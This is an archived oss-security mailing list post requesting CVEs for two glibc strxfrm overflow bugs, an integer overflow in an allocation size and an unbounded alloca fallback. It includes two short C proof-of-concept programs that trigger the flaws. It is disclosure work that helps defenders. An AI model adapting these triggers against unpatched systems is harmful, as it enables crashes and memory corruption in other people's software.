Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 13 Feb 2015 12:17:25 +0000
From: mancha <mancha1@...o.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: CVE Requests - glibc overflows (strxfrm)

Hello.

1. Joseph Myers discovered strxfrm is vulnerable to integer overflows
when computing memory allocation sizes (similar to CVE-2012-4412). i.e.
in string/strxfrm_l.c:

  idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1));

Attached strxfrm-int32.c should trigger on 32-bit machines.

2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if
malloc fails making it vulnerable to stack-based buffer overflows
(similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should
trigger.


Both issues were fixed in glibc 2.21 [2] and a quick check shows
vulnerable code appears to go back to at least glibc 2.3.

Please allocate CVEs for these issues. Many thanks.

--mancha

==============

[1] https://sourceware.org/bugzilla/show_bug.cgi?id=16009
[2] https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480ed

/* gcc -o strxfrm-alloca strxfrm-alloca.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 512000
 
int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);
  char *avail = NULL;

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  do
    avail = malloc(BUFLEN);
  while(avail);

  int len = strxfrm(dst, src, BUFLEN);
  return 0;
}

/* gcc -o strxfrm-int32 strxfrm-int32.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 858993459

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  int len = strxfrm(dst, src, BUFLEN);
  return 0;
}


[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ